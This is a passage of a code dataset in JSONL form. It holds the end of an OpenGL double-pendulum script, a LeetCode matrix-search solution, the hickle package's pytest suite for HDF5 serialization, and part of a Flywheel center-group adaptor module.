glfw.window_should_close(window):\n\t\tglfw.poll_events()\n\n\t\trender(th1, th2, camAng)\n\t\t(th1, w1, th2, w2) = runge_kutta([th1, w1, th2, w2], 0.003)\n\t\tglfw.swap_buffers(window)\n\t\t\n\tglfw.terminate()\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"parkseobin/double_pendulum","sub_path":"PyOpenGL/doublependulum.py","file_name":"doublependulum.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39125672316","text":"# 74. Search a 2D Matrix\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if not matrix:\n return False\n\n flatten_list = [temp for sublist in matrix for temp in sublist]\n\n start = 0\n end = len(flatten_list)-1\n\n while start <= end:\n middle = (start+end)//2\n\n if target == flatten_list[middle]: return True\n elif target > flatten_list[middle]: start = middle +1\n else: end = middle-1\n\n return False\n","repo_name":"raviarrow88/Python-coding","sub_path":"leetcode/lp-74.py","file_name":"lp-74.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32677454558","text":"#! /usr/bin/env python\n# encoding: utf-8\n\"\"\"\n# test_hickle.py\n\nUnit test for hickle package.\n\n\"\"\"\n\n\n# %% IMPORTS\n\n# Built-in imports\nfrom collections import OrderedDict as odict\nimport os\nimport re\nfrom pprint import pprint\nimport pickle\n\n\n# Package imports\nimport numpy as np\nfrom py.path import local\nimport pytest\n\n# hickle imports\nfrom hickle import dump, hickle, load, lookup\n\n# Set current working directory to the temporary directory\nlocal.get_temproot().chdir()\n\n\n# %% GLOBALS\nNESTED_DICT = {\n \"level1_1\": {\n \"level2_1\": [1, 2, 3],\n \"level2_2\": [4, 5, 6]\n },\n \"level1_2\": {\n \"level2_1\": [1, 2, 3],\n \"level2_2\": [4, 5, 6]\n },\n \"level1_3\": {\n \"level2_1\": {\n \"level3_1\": [1, 2, 3],\n \"level3_2\": [4, 5, 6]\n },\n \"level2_2\": [4, 5, 6]\n }\n}\n\n\n# %% FIXTURES\n \n@pytest.fixture\ndef test_file_name(request):\n \"\"\"\n create test dependent filename path string\n \"\"\"\n yield \"{}.hkl\".format(request.function.__name__)\n\n\n# %% HELPER DEFINITIONS\n\n# Define a test function that must be serialized and unpacked again\ndef func(a, b, c=0):\n \"\"\" just something to do \"\"\"\n return(a, b, c)\n\n# the following is required as package name of with_state is hickle\n# and load_loader refuses load any loader module for classes defined inside\n# hickle package exempt when defined within load_*.py loaders modules.\n# That has to be done by hickle sub modules directly using register_class function\npickle_dumps = pickle.dumps\npickle_loads = pickle.loads\n\ntypes_to_hide = set() \n\ndef make_visible_to_dumps(obj,protocol=None,*,fix_imports=True):\n \"\"\"\n simulate loader functions defined outside hickle package\n \"\"\"\n if obj in types_to_hide:\n obj.__module__ = re.sub(r'^\\s*(?!hickle\\.)','hickle.',obj.__module__)\n elif obj.__class__ in types_to_hide:\n obj.__class__.__module__ = re.sub(r'^\\s*(?!hickle\\.)','hickle.',obj.__class__.__module__)\n return pickle_dumps(obj,protocol,fix_imports=fix_imports)\n\ndef hide_from_hickle(bytes_obj,*,fix_imports=True,encoding=\"ASCII\",errors=\"strict\"):\n \"\"\"\n simulate loader function defined outside hickle package\n \"\"\"\n obj = pickle_loads(bytes_obj,fix_imports = fix_imports, encoding = encoding, errors = errors)\n if obj in 
types_to_hide:\n obj.__module__ = re.sub(r'^\\s*hickle\\.','',obj.__module__)\n elif obj.__class__ in types_to_hide:\n obj.__class__.__module__ = re.sub(r'^\\s*hickle\\.','',obj.__class__.__module__)\n return obj\n\n# Define a class that must always be pickled\nclass with_state(object):\n \"\"\"\n A class that always must be handled by create_pickled_dataset\n \"\"\"\n def __init__(self):\n self.a = 12\n self.b = {\n 'love': np.ones([12, 7]),\n 'hatred': np.zeros([4, 9])}\n\n def __getstate__(self):\n self.a *= 2\n return({\n 'a': self.a,\n 'b': self.b})\n\n def __setstate__(self, state):\n self.a = state['a']\n self.b = state['b']\n\n def __getitem__(self, index):\n if(index == 0):\n return(self.a)\n if(index < 2):\n return(self.b['hatred'])\n if(index > 2):\n raise ValueError(\"index unknown\")\n return(self.b['love'])\n\ntypes_to_hide.add(with_state)\n\n# %% FUNCTION DEFINITIONS\ndef test_invalid_file():\n \"\"\" Test if trying to use a non-file object fails. \"\"\"\n\n with pytest.raises(hickle.FileError):\n dump('test', ())\n\n\ndef test_state_obj(monkeypatch,test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a class object with pickle states\n\n https://github.com/telegraphic/hickle/issues/125\"\"\"\n\n with monkeypatch.context() as monkey:\n monkey.setattr(with_state,'__module__',re.sub(r'^\\s*hickle\\.','',with_state.__module__))\n monkey.setattr(pickle,'dumps',make_visible_to_dumps)\n mode = 'w'\n obj = with_state()\n with pytest.warns(lookup.SerializedWarning):\n dump(obj, test_file_name, mode,**compression_kwargs)\n monkey.setattr(pickle,'loads',hide_from_hickle)\n obj_hkl = load(test_file_name)\n assert isinstance(obj,obj_hkl.__class__) or isinstance(obj_hkl,obj.__class__)\n assert np.allclose(obj[1], obj_hkl[1])\n\n\ndef test_local_func(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a local function\n\n https://github.com/telegraphic/hickle/issues/119\"\"\"\n\n mode = 'w'\n with pytest.warns(lookup.SerializedWarning):\n dump(func, test_file_name, mode,**compression_kwargs)\n func_hkl = load(test_file_name)\n assert isinstance(func,func_hkl.__class__) or isinstance(func_hkl,func.__class__)\n assert func(1, 2) == func_hkl(1, 2)\n\n\ndef test_non_empty_group(test_file_name,compression_kwargs):\n \"\"\" Test if attempting to dump to a group with data fails \"\"\"\n\n hickle.dump(None, test_file_name,**compression_kwargs)\n with pytest.raises(ValueError):\n dump(None, test_file_name, 'r+',**compression_kwargs)\n\n\ndef test_string(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a string \"\"\"\n mode = 'w'\n string_obj = \"The quick brown fox jumps over the lazy dog\"\n dump(string_obj, test_file_name, mode,**compression_kwargs)\n string_hkl = load(test_file_name)\n assert isinstance(string_hkl, str)\n assert string_obj == string_hkl\n\n\ndef test_65bit_int(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading an integer with arbitrary precision\n\n https://github.com/telegraphic/hickle/issues/113\"\"\"\n i = 2**65-1\n dump(i, test_file_name,**compression_kwargs)\n i_hkl = load(test_file_name)\n assert i == i_hkl\n\n j = -2**63-1\n dump(j, test_file_name,**compression_kwargs)\n j_hkl = load(test_file_name)\n assert j == j_hkl\n\ndef test_list(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a list \"\"\"\n filename, mode = 'test_list.h5', 'w'\n list_obj = [1, 2, 3, 4, 5]\n dump(list_obj, test_file_name, mode=mode,**compression_kwargs)\n list_hkl = load(test_file_name)\n try:\n assert isinstance(list_hkl, 
list)\n assert list_obj == list_hkl\n import h5py\n a = h5py.File(test_file_name, 'r')\n a.close()\n\n except AssertionError:\n print(\"ERR:\", list_obj, list_hkl)\n import h5py\n\n raise\n\n\ndef test_set(test_file_name,compression_kwargs) :\n \"\"\" Dumping and loading a list \"\"\"\n mode = 'w'\n list_obj = set([1, 0, 3, 4.5, 11.2])\n dump(list_obj, test_file_name, mode,**compression_kwargs)\n list_hkl = load(test_file_name)\n try:\n assert isinstance(list_hkl, set)\n assert list_obj == list_hkl\n except AssertionError:\n print(type(list_obj))\n print(type(list_hkl))\n raise\n\n\ndef test_numpy(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading numpy array \"\"\"\n mode = 'w'\n dtypes = ['float32', 'float64', 'complex64', 'complex128']\n\n for dt in dtypes:\n array_obj = np.ones(8, dtype=dt)\n dump(array_obj, test_file_name, mode,**compression_kwargs)\n array_hkl = load(test_file_name)\n try:\n assert array_hkl.dtype == array_obj.dtype\n assert np.all((array_hkl, array_obj))\n except AssertionError:\n print(array_hkl)\n print(array_obj)\n raise\n\n\ndef test_masked(test_file_name,compression_kwargs):\n \"\"\" Test masked numpy array \"\"\"\n mode = 'w'\n a = np.ma.array([1, 2, 3, 4], dtype='float32', mask=[0, 1, 0, 0])\n\n dump(a, test_file_name, mode,**compression_kwargs)\n a_hkl = load(test_file_name)\n\n try:\n assert a_hkl.dtype == a.dtype\n assert np.all((a_hkl, a))\n except AssertionError:\n print(a_hkl)\n print(a)\n raise\n\n\ndef test_object_numpy(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a NumPy array containing non-NumPy objects.\n\n https://github.com/telegraphic/hickle/issues/90\"\"\"\n\n # VisibleDeprecationWarning from newer numpy versions\n #np_array_data = np.array([[NESTED_DICT], ('What is this?',), {1, 2, 3, 7, 1}])\n arr = np.array([NESTED_DICT])#, ('What is this?',), {1, 2, 3, 7, 1}])\n dump(arr, test_file_name,**compression_kwargs)\n arr_hkl = load(test_file_name)\n assert np.all(arr == arr_hkl)\n\n arr2 = np.array(NESTED_DICT)\n dump(arr2, test_file_name,**compression_kwargs)\n arr_hkl2 = load(test_file_name)\n assert np.all(arr2 == arr_hkl2)\n\n\ndef test_string_numpy(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading NumPy arrays containing Python 3 strings. 
\"\"\"\n\n arr = np.array([\"1313e\", \"was\", \"maybe?\", \"here\"])\n dump(arr, test_file_name,**compression_kwargs)\n arr_hkl = load(test_file_name)\n assert np.all(arr == arr_hkl)\n\n\ndef test_list_object_numpy(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a list of NumPy arrays with objects.\n\n https://github.com/telegraphic/hickle/issues/90\"\"\"\n\n # VisibleDeprecationWarning from newer numpy versions\n lst = [np.array(NESTED_DICT)]#, np.array([('What is this?',),\n # {1, 2, 3, 7, 1}])]\n dump(lst, test_file_name,**compression_kwargs)\n lst_hkl = load(test_file_name)\n assert np.all(lst[0] == lst_hkl[0])\n #assert np.all(lst[1] == lst_hkl[1])\n\n\ndef test_dict(test_file_name,compression_kwargs):\n \"\"\" Test dictionary dumping and loading \"\"\"\n mode = 'w'\n\n dd = {\n 'name': b'Danny',\n 'age': 28,\n 'height': 6.1,\n 'dork': True,\n 'nums': [1, 2, 3],\n 'narr': np.array([1, 2, 3]),\n }\n\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n for k in dd.keys():\n try:\n assert k in dd_hkl.keys()\n\n if isinstance(dd[k], np.ndarray):\n assert np.all((dd[k], dd_hkl[k]))\n else:\n pass\n assert isinstance(dd_hkl[k], dd[k].__class__)\n except AssertionError:\n print(k)\n print(dd_hkl[k])\n print(dd[k])\n print(type(dd_hkl[k]), type(dd[k]))\n raise\n\n\ndef test_odict(test_file_name,compression_kwargs):\n \"\"\" Test ordered dictionary dumping and loading\n\n https://github.com/telegraphic/hickle/issues/65\"\"\"\n mode = 'w'\n\n od = odict(((3, [3, 0.1]), (7, [5, 0.1]), (5, [3, 0.1])))\n dump(od, test_file_name, mode,**compression_kwargs)\n od_hkl = load(test_file_name)\n\n assert od.keys() == od_hkl.keys()\n\n for od_item, od_hkl_item in zip(od.items(), od_hkl.items()):\n assert od_item == od_hkl_item\n\n\ndef test_empty_dict(test_file_name,compression_kwargs):\n \"\"\" Test empty dictionary dumping and loading\n\n https://github.com/telegraphic/hickle/issues/91\"\"\"\n mode = 'w'\n\n dump({}, test_file_name, mode,**compression_kwargs)\n assert load(test_file_name) == {}\n\n\n\n# TODO consider converting to parameterized test\n# or enable implicit parameterizing of all tests\n# though compression_kwargs fixture providing\n# various combinations of compression and chunking\n# related keywords\n@pytest.mark.no_compression\ndef test_compression(test_file_name):\n \"\"\" Test compression on datasets\"\"\"\n\n mode = 'w'\n dtypes = ['int32', 'float32', 'float64', 'complex64', 'complex128']\n\n comps = [None, 'gzip', 'lzf']\n\n for dt in dtypes:\n for cc in comps:\n array_obj = np.ones(32768, dtype=dt)\n dump(array_obj, test_file_name, mode, compression=cc)\n print(cc, os.path.getsize(test_file_name))\n array_hkl = load(test_file_name)\n try:\n assert array_hkl.dtype == array_obj.dtype\n assert np.all((array_hkl, array_obj))\n except AssertionError:\n print(array_hkl)\n print(array_obj)\n raise\n\n\ndef test_dict_int_key(test_file_name,compression_kwargs):\n \"\"\" Test for dictionaries with integer keys \"\"\"\n mode = 'w'\n\n dd = {\n 0: \"test\",\n 1: \"test2\"\n }\n\n dump(dd, test_file_name, mode,**compression_kwargs)\n load(test_file_name)\n\n\ndef test_dict_nested(test_file_name,compression_kwargs):\n \"\"\" Test for dictionaries with integer keys \"\"\"\n mode = 'w'\n\n dd = NESTED_DICT\n\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n ll_hkl = dd_hkl[\"level1_3\"][\"level2_1\"][\"level3_1\"]\n ll = dd[\"level1_3\"][\"level2_1\"][\"level3_1\"]\n assert ll == ll_hkl\n\n\ndef 
test_masked_dict(test_file_name,compression_kwargs):\n \"\"\" Test dictionaries with masked arrays \"\"\"\n\n filename, mode = 'test.h5', 'w'\n\n dd = {\n \"data\": np.ma.array([1, 2, 3], mask=[True, False, False]),\n \"data2\": np.array([1, 2, 3, 4, 5])\n }\n\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n for k in dd.keys():\n try:\n assert k in dd_hkl.keys()\n if isinstance(dd[k], np.ndarray):\n assert np.all((dd[k], dd_hkl[k]))\n elif isinstance(dd[k], np.ma.MaskedArray):\n print(dd[k].data)\n print(dd_hkl[k].data)\n assert np.allclose(dd[k].data, dd_hkl[k].data)\n assert np.allclose(dd[k].mask, dd_hkl[k].mask)\n\n assert isinstance(dd_hkl[k], dd[k].__class__)\n\n except AssertionError:\n print(k)\n print(dd_hkl[k])\n print(dd[k])\n print(type(dd_hkl[k]), type(dd[k]))\n raise\n\n\ndef test_np_float(test_file_name,compression_kwargs):\n \"\"\" Test for singular np dtypes \"\"\"\n mode = 'w'\n\n dtype_list = (np.float16, np.float32, np.float64,\n np.complex64, np.complex128,\n np.int8, np.int16, np.int32, np.int64,\n np.uint8, np.uint16, np.uint32, np.uint64)\n\n for dt in dtype_list:\n\n dd = dt(1)\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n assert dd == dd_hkl\n assert dd.dtype == dd_hkl.dtype\n\n dd = {}\n for dt in dtype_list:\n dd[str(dt)] = dt(1.0)\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n print(dd)\n for dt in dtype_list:\n assert dd[str(dt)] == dd_hkl[str(dt)]\n\n\n# TODO consider converting to parameterized test\n# or enable implicit parameterizing of all tests\n# though compression_kwargs fixture providing\n# various combinations of compression and chunking\n# related keywords\n@pytest.mark.no_compression\ndef test_comp_kwargs(test_file_name):\n \"\"\" Test compression with some kwargs for shuffle and chunking \"\"\"\n\n mode = 'w'\n dtypes = ['int32', 'float32', 'float64', 'complex64', 'complex128']\n\n comps = [None, 'gzip', 'lzf']\n chunks = [(100, 100), (250, 250)]\n shuffles = [True, False]\n scaleoffsets = [0, 1, 2]\n\n for dt in dtypes:\n for cc in comps:\n for ch in chunks:\n for sh in shuffles:\n for so in scaleoffsets:\n kwargs = {\n 'compression': cc,\n 'dtype': dt,\n 'chunks': ch,\n 'shuffle': sh,\n 'scaleoffset': so\n }\n array_obj = NESTED_DICT\n dump(array_obj, test_file_name, mode, compression=cc)\n print(kwargs, os.path.getsize(test_file_name))\n load(test_file_name)\n\n\ndef test_list_numpy(test_file_name,compression_kwargs):\n \"\"\" Test converting a list of numpy arrays \"\"\"\n\n mode = 'w'\n\n a = np.ones(1024)\n b = np.zeros(1000)\n c = [a, b]\n\n dump(c, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n print(dd_hkl)\n\n assert isinstance(dd_hkl, list)\n assert isinstance(dd_hkl[0], np.ndarray)\n\n\ndef test_tuple_numpy(test_file_name,compression_kwargs):\n \"\"\" Test converting a list of numpy arrays \"\"\"\n\n mode = 'w'\n\n a = np.ones(1024)\n b = np.zeros(1000)\n c = (a, b, a)\n\n dump(c, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n print(dd_hkl)\n\n assert isinstance(dd_hkl, tuple)\n assert isinstance(dd_hkl[0], np.ndarray)\n\n\ndef test_numpy_dtype(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a NumPy dtype \"\"\"\n\n dtype = np.dtype('int64')\n dump(dtype, test_file_name,**compression_kwargs)\n dtype_hkl = load(test_file_name)\n assert dtype == dtype_hkl\n\n\ndef test_none(test_file_name,compression_kwargs):\n \"\"\" Test None type 
hickling \"\"\"\n\n mode = 'w'\n\n a = None\n\n dump(a, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n print(a)\n print(dd_hkl)\n\n assert isinstance(dd_hkl, type(None))\n\n\ndef test_list_order(test_file_name,compression_kwargs):\n \"\"\" https://github.com/telegraphic/hickle/issues/26 \"\"\"\n d = [np.arange(n + 1) for n in range(20)]\n dump(d, test_file_name,**compression_kwargs)\n d_hkl = load(test_file_name)\n\n try:\n for ii, xx in enumerate(d):\n assert d[ii].shape == d_hkl[ii].shape\n for ii, xx in enumerate(d):\n assert np.allclose(d[ii], d_hkl[ii])\n except AssertionError:\n print(d[ii], d_hkl[ii])\n raise\n\n\ndef test_embedded_array(test_file_name,compression_kwargs):\n \"\"\" See https://github.com/telegraphic/hickle/issues/24 \"\"\"\n\n d_orig = [[np.array([10., 20.]), np.array([10, 20, 30])],\n [np.array([10, 2]), np.array([1.])]]\n dump(d_orig, test_file_name,**compression_kwargs)\n d_hkl = load(test_file_name)\n\n for ii, xx in enumerate(d_orig):\n for jj, yy in enumerate(xx):\n assert np.allclose(d_orig[ii][jj], d_hkl[ii][jj])\n\n print(d_hkl)\n print(d_orig)\n\n\n##############\n# NEW TESTS #\n###############\ndef generate_nested():\n a = [1, 2, 3]\n b = [a, a, a]\n c = [a, b, 's']\n d = [a, b, c, c, a]\n e = [d, d, d, d, 1]\n f = {'a': a, 'b': b, 'e': e}\n g = {'f': f, 'a': e, 'd': d}\n h = {'h': g, 'g': f}\n z = [f, a, b, c, d, e, f, g, h, g, h]\n a = np.array([1, 2, 3, 4])\n b = set([1, 2, 3, 4, 5])\n c = (1, 2, 3, 4, 5)\n d = np.ma.array([1, 2, 3, 4, 5, 6, 7, 8])\n z = {'a': a, 'b': b, 'c': c, 'd': d, 'z': z}\n return z\n\ndef test_dump_nested(test_file_name,compression_kwargs):\n \"\"\" Dump a complicated nested object to HDF5\n \"\"\"\n z = generate_nested()\n dump(z, test_file_name, mode='w',**compression_kwargs)\n\ndef test_ndarray(test_file_name,compression_kwargs):\n a = np.array([1, 2, 3])\n b = np.array([2, 3, 4])\n z = (a, b)\n\n print(\"Original:\")\n pprint(z)\n dump(z, test_file_name, mode='w',**compression_kwargs)\n\n print(\"\\nReconstructed:\")\n z = load(test_file_name)\n pprint(z)\n\n\ndef test_ndarray_masked(test_file_name,compression_kwargs):\n a = np.ma.array([1, 2, 3])\n b = np.ma.array([2, 3, 4], mask=[True, False, True])\n z = (a, b)\n\n print(\"Original:\")\n pprint(z)\n dump(z, test_file_name, mode='w',**compression_kwargs)\n\n print(\"\\nReconstructed:\")\n z = load(test_file_name)\n pprint(z)\n\n\ndef test_simple_dict(test_file_name,compression_kwargs):\n a = {'key1': 1, 'key2': 2}\n\n dump(a, test_file_name,**compression_kwargs)\n z = load(test_file_name)\n\n pprint(a)\n pprint(z)\n\n\ndef test_complex_dict(test_file_name,compression_kwargs):\n a = {'akey': 1, 'akey2': 2}\n c = {'ckey': \"hello\", \"ckey2\": \"hi there\"}\n z = {'zkey1': a, 'zkey2': a, 'zkey3': c}\n\n print(\"Original:\")\n pprint(z)\n dump(z, test_file_name, mode='w',**compression_kwargs)\n\n print(\"\\nReconstructed:\")\n z = load(test_file_name)\n pprint(z)\n\ndef test_complex(test_file_name,compression_kwargs):\n \"\"\" Test complex value dtype is handled correctly\n\n https://github.com/telegraphic/hickle/issues/29 \"\"\"\n\n data = {\"A\": 1.5, \"B\": 1.5 + 1j, \"C\": np.linspace(0, 1, 4) + 2j}\n dump(data, test_file_name,**compression_kwargs)\n data2 = load(test_file_name)\n for key in data.keys():\n assert isinstance(data[key], data2[key].__class__)\n\n\ndef test_nonstring_keys(test_file_name,compression_kwargs):\n \"\"\" Test that keys are reconstructed back to their original datatypes\n 
https://github.com/telegraphic/hickle/issues/36\n \"\"\"\n\n data = {\n u'test': 123,\n 'def': [b'test'],\n 'hik': np.array([1, 2, 3]),\n 0: 0,\n True: ['test'],\n 1.1: 'hey',\n 1j: 'complex_hashable',\n (1, 2): 'boo',\n ('A', 17.4, 42): [1, 7, 'A'],\n (): '1313e was here',\n '0': 0,\n None: None\n }\n\n print(data)\n dump(data, test_file_name,**compression_kwargs)\n data2 = load(test_file_name)\n print(data2)\n\n for key in data.keys():\n assert key in data2.keys()\n\n print(data2)\n\n@pytest.mark.no_compression\ndef test_scalar_compression(test_file_name):\n \"\"\" Test bug where compression causes a crash on scalar datasets\n\n (Scalars are incompressible!)\n https://github.com/telegraphic/hickle/issues/37\n \"\"\"\n data = {'a': 0, 'b': np.float(2), 'c': True}\n\n dump(data, test_file_name, compression='gzip')\n data2 = load(test_file_name)\n\n print(data2)\n for key in data.keys():\n assert isinstance(data[key], data2[key].__class__)\n\n\ndef test_bytes(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a string. PYTHON3 ONLY \"\"\"\n\n mode = 'w'\n string_obj = b\"The quick brown fox jumps over the lazy dog\"\n dump(string_obj, test_file_name, mode,**compression_kwargs)\n string_hkl = load(test_file_name)\n print(type(string_obj))\n print(type(string_hkl))\n assert isinstance(string_hkl, bytes)\n assert string_obj == string_hkl\n\n\ndef test_np_scalar(test_file_name,compression_kwargs):\n \"\"\" Numpy scalar datatype\n\n https://github.com/telegraphic/hickle/issues/50\n \"\"\"\n\n r0 = {'test': np.float64(10.)}\n dump(r0, test_file_name,**compression_kwargs)\n r = load(test_file_name)\n print(r)\n assert isinstance(r0['test'], r['test'].__class__)\n\n\ndef test_slash_dict_keys(test_file_name,compression_kwargs):\n \"\"\" Support for having slashes in dict keys\n\n https://github.com/telegraphic/hickle/issues/124\"\"\"\n dct = {'a/b': [1, '2'], 1.4: 3}\n\n dump(dct, test_file_name, 'w',**compression_kwargs)\n dct_hkl = load(test_file_name)\n\n assert isinstance(dct_hkl, dict)\n for key, val in dct_hkl.items():\n assert val == dct.get(key)\n\n # Check that having backslashes in dict keys will serialize the dict\n dct2 = {'a\\\\b': [1, '2'], 1.4: 3}\n with pytest.warns(None) as not_expected:\n dump(dct2, test_file_name,**compression_kwargs)\n assert not not_expected\n\n\n# %% MAIN SCRIPT\nif __name__ == '__main__':\n \"\"\" Some tests and examples \"\"\"\n from _pytest.fixtures import FixtureRequest\n\n for filename in test_file_name(FixtureRequest(test_np_scalar)):\n test_np_scalar(filename)\n for filename in test_file_name(FixtureRequest(test_scalar_compression)):\n test_scalar_compression(filename)\n for filename in test_file_name(FixtureRequest(test_complex)):\n test_complex(filename)\n for filename in test_file_name(FixtureRequest(test_none)):\n test_none(filename)\n for filename in test_file_name(FixtureRequest(test_masked_dict)):\n test_masked_dict(filename)\n for filename in test_file_name(FixtureRequest(test_list)):\n test_list(filename)\n for filename in test_file_name(FixtureRequest(test_set)):\n test_set(filename)\n for filename in test_file_name(FixtureRequest(test_numpy)):\n test_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_dict)):\n test_dict(filename)\n for filename in test_file_name(FixtureRequest(test_odict)):\n test_odict(filename)\n for filename in test_file_name(FixtureRequest(test_empty_dict)):\n test_empty_dict(filename)\n for filename in test_file_name(FixtureRequest(test_compression)):\n test_compression(filename)\n for 
filename in test_file_name(FixtureRequest(test_masked)):\n test_masked(filename)\n for filename in test_file_name(FixtureRequest(test_dict_nested)):\n test_dict_nested(filename)\n for filename in test_file_name(FixtureRequest(test_comp_kwargs)):\n test_comp_kwargs(filename)\n for filename in test_file_name(FixtureRequest(test_list_numpy)):\n test_list_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_tuple_numpy)):\n test_tuple_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_list_order)):\n test_list_order(filename)\n for filename in test_file_name(FixtureRequest(test_embedded_array)):\n test_embedded_array(filename)\n for filename in test_file_name(FixtureRequest(test_np_float)):\n test_np_float(filename)\n for filename in test_file_name(FixtureRequest(test_string)):\n test_string(filename)\n for filename in test_file_name(FixtureRequest(test_nonstring_keys)):\n test_nonstring_keys(filename)\n for filename in test_file_name(FixtureRequest(test_bytes)):\n test_bytes(filename)\n\n # NEW TESTS\n for filename in test_file_name(FixtureRequest(test_dump_nested)):\n test_dump_nested(filename)\n for filename in test_file_name(FixtureRequest(test_ndarray)):\n test_ndarray(filename)\n for filename in test_file_name(FixtureRequest(test_ndarray_masked)):\n test_ndarray_masked(filename)\n for filename in test_file_name(FixtureRequest(test_simple_dict)):\n test_simple_dict(filename)\n for filename in test_file_name(FixtureRequest(test_complex_dict)):\n test_complex_dict(filename)\n for filename in test_file_name(FixtureRequest(test_dict_int_key)):\n test_dict_int_key(filename)\n for filename in test_file_name(FixtureRequest(test_local_func)):\n test_local_func(filename)\n for filename in test_file_name(FixtureRequest(test_slash_dict_keys)):\n test_slash_dict_keys(filename)\n test_invalid_file()\n for filename in test_file_name(FixtureRequest(test_non_empty_group)):\n test_non_empty_group(filename)\n for filename in test_file_name(FixtureRequest(test_numpy_dtype)):\n test_numpy_dtype(filename)\n for filename in test_file_name(FixtureRequest(test_object_numpy)):\n test_object_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_string_numpy)):\n test_string_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_list_object_numpy)):\n test_list_object_numpy(filename)\n\n # Cleanup\n for filename in test_file_name(FixtureRequest(print)):\n print(filename)\n","repo_name":"telegraphic/hickle","sub_path":"hickle/tests/test_hickle.py","file_name":"test_hickle.py","file_ext":"py","file_size_in_byte":26652,"program_lang":"python","lang":"en","doc_type":"code","stars":473,"dataset":"github-code","pt":"66"} +{"seq_id":"26223571595","text":"\"\"\"Module for working with a Group representing a center.\n\nShould be used when starting from centers already created using\n`projects.CenterMappingAdaptor`.\n\"\"\"\nimport logging\nimport re\nfrom typing import Dict, List, Optional\n\nimport flywheel\nfrom flywheel_adaptor.flywheel_proxy import FlywheelProxy\nfrom flywheel_adaptor.group_adaptor import GroupAdaptor\nfrom flywheel_adaptor.project_adaptor import ProjectAdaptor\nfrom projects.template_project import TemplateProject\n\nlog = logging.getLogger(__name__)\n\n\nclass CenterGroup(GroupAdaptor):\n \"\"\"Defines an adaptor for a group representing a center.\"\"\"\n\n def __init__(self, *, group: flywheel.Group, proxy: FlywheelProxy) -> None:\n super().__init__(group=group, proxy=proxy)\n self.__datatypes: List[str] = []\n self.__ingest_stages = 
['ingest', 'retrospective']\n\n def __get_matching_projects(self, prefix: str) -> List[ProjectAdaptor]:\n \"\"\"Returns the projects for the center with labels that match the\n prefix.\n\n Returns:\n the list of matching projects for the group\n \"\"\"\n pattern = re.compile(rf\"^{prefix}\")\n return [\n ProjectAdaptor(project=project, proxy=self.proxy())\n for project in self.projects() if pattern.match(project.label)\n ]\n\n def get_ingest_projects(self) -> List[ProjectAdaptor]:\n \"\"\"Returns the ingest projects for the center.\n\n Returns:\n the list of ingest projects\n \"\"\"\n projects: List[ProjectAdaptor] = []\n for stage in self.__ingest_stages:\n projects = projects + self.__get_matching_projects(f\"{stage}-\")\n\n return projects\n\n def get_accepted_project(self) -> Optional[ProjectAdaptor]:\n \"\"\"Returns the accepted project for this center.\n\n Returns:\n the project labeled 'accepted', None if there is none\n \"\"\"\n projects = self.__get_matching_projects('accepted')\n if not projects:\n return None\n\n return projects[0]\n\n def get_metadata_project(self) -> Optional[ProjectAdaptor]:\n \"\"\"Returns the metadata project for this center.\n\n Returns:\n the project labeled 'metadata', None if there is none\n \"\"\"\n projects = self.__get_matching_projects('metadata')\n if not projects:\n return None\n\n return projects[0]\n\n @classmethod\n def get_datatype(cls, *, stage: str, label: str) -> Optional[str]:\n \"\"\"Gets the datatype from a string with format `-`.\n\n Args:\n stage: stage name\n label: string with stage and datatype\n Returns:\n the datatype in the string if matches pattern. Otherwise, None\n \"\"\"\n pattern = re.compile(rf\"^{stage}-(\\w+)\")\n match = pattern.match(label)\n if not match:\n return None\n\n return match.group(1)\n\n def get_datatypes(self) -> List[str]:\n \"\"\"Returns the list of data types for the ingest projects of this\n center.\n\n Returns:\n list of datatype names\n \"\"\"\n if self.__datatypes:\n return self.__datatypes\n\n datatypes = []\n for stage in self.__ingest_stages:\n projects = self.__get_matching_projects(f\"{stage}-\")\n for project in projects:\n datatype = CenterGroup.get_datatype(stage=stage,\n label=project.label)\n if datatype:\n datatypes.append(datatype)\n self.__datatypes = list(set(datatypes))\n\n return self.__datatypes\n\n def apply_to_ingest(\n self, *, stage: str,\n template_map: Dict[str, Dict[str, TemplateProject]]) -> None:\n \"\"\"Applies the templates to the ingest stage projects in group.\n\n Expects that project labels match pattern\n `-`.\n For instance, `ingest-form` or `retrospective-dicom`.\n\n Args:\n stage: name of ingest stage\n template_map: map from datatype to stage to template project\n \"\"\"\n ingest_projects = self.__get_matching_projects(f\"{stage}-\")\n if not ingest_projects:\n log.warning('no ingest stage projects for group %s', self.label)\n return\n\n for project in ingest_projects:\n datatype = CenterGroup.get_datatype(stage=stage,\n label=project.label)\n if not datatype:\n log.info('ingest project %s has no datatype', project.label)\n continue\n\n self.__apply_to(stage=stage,\n template_map=template_map,\n 